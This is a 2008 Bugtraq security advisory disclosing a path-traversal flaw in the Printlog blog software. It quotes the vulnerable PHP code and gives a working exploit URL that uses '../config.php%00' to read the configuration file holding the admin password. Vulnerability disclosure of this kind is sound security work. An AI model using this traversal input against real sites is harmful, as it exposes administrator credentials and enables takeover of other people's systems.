Printlog <= 0.4: Remote File Edition Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: Printlog <= 0.4: Remote File Edition Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Wed, 1 Oct 2008 03:02:45 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=8sDXoSTT10pztInM9itUyCDZ2AE6weNbLIAIdDxMV6Q=; b=fB04n88IdKzKnU2a5kIc3ukl5KKDPpNRBwj1/WOJUsnHYtCvbXRV5NzqgCmlj+v7+g Miu3LIochtukc8OypE7DjcqrhRWA6arSL6QHL37+53762oQbU1vaWhGDukt8TC5FhuE8 hKGXkHPJClF9SS8LshSLZsmSMdG3W8HxL8Rk8=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=R9P8iTOHBGCfb024sh9zsf5UZcNm46ExYvQS4/2zwvPYUH0EhdB5D+NLf76Q7PVtS+ 1FZPVYLX3cqTbI0DgQOjjTFOd4+xBbJc6T6VVhmxvjP+E9AkH9v+MZ4JgWdnUZTrJ/7z n9Xfa2narNBRx5kD70qJuCkvkI9ZdS5n7nQuA=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
-- Description (by the author's page) --
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.
-- Bug --
You can navigate and see the entries. Something like as:
http://localhost/p/index.php?option=viewEntry&filename=00001
Code doesn't check the comments directory:
709. function viewEntry() {
710. $fileName =
isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
711. global $postdir, $separator, $newPostFile, $newFullPostNumber,
$debugMode, $config_textAreaCols, $config_textAreaRows;
712. global $config_allowComments, $config_commentsSecurityCode,
$config_CAPTCHALength, $config_randomString;
713. global $commentdir,$config_dbFilesExtension,
$config_onlyNumbersOnCAPTCHA;
714. $viewFileName=$postdir.$fileName.$config_dbFilesExtension;
-- Exploit --
If magic quotes are off you can do:
http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
config.php has the admin password